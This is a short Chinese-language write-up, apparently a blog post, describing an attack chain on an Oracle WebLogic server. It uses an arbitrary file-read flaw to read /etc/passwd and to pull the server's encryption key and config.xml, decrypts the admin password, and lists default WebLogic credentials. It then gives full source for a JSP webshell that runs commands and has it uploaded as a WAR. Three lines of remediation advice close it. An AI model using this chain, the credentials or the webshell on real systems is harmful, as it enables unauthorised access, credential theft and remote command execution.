一、漏洞描述
开放了wblogic端口,进去发现有任意读取文件漏洞,配合解密工具读出密码,登录后台传入webshell
二、影响版本
当前版本
三、影响组件
weblogic
四、漏洞判断
hello/file.jsp?path=/etc/passwd 发现有任意文件下载
五、漏洞利用
首先我们先进入weblogic目录,http://192.168.116.144:7001/console/
然后我们访问 /hello/file.jsp?path=security/SerializedSystemIni.dat
抓包!然后看reponse那堆乱码,右键保存文件,这个是{AES}密钥
然后下载 /hello/file.jsp?path=config/config.xml
找到框着的这个 这个是密文
解密,就发现密码啦
weblogic的弱口令
system/password
weblogic/weblogic
admin/security
joe/password
mary/password
system/security
wlcsystem/wlcsystem
wlpisystem/wlpisystem
生成webshell
cmd.jsp
<%@ page import="java.io.*" %> <% String cmd =
request.getParameter("cmd"); String output = ""; if(cmd !=
null) { String s = null; try { Process p =
Runtime.getRuntime().exec(cmd); BufferedReader sI = new
BufferedReader(new InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s +"\r\n"; } }
catch(IOException e) { e.printStackTrace(); } }
out.println(output);%>生成cmd.war
上传com.war 
回显成功
六、漏洞修复
1.设置Config.do页面登录授权后访问;
2.IPS等防御产品可以加入相应的特征;
3.升级到官方最新版本
581
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
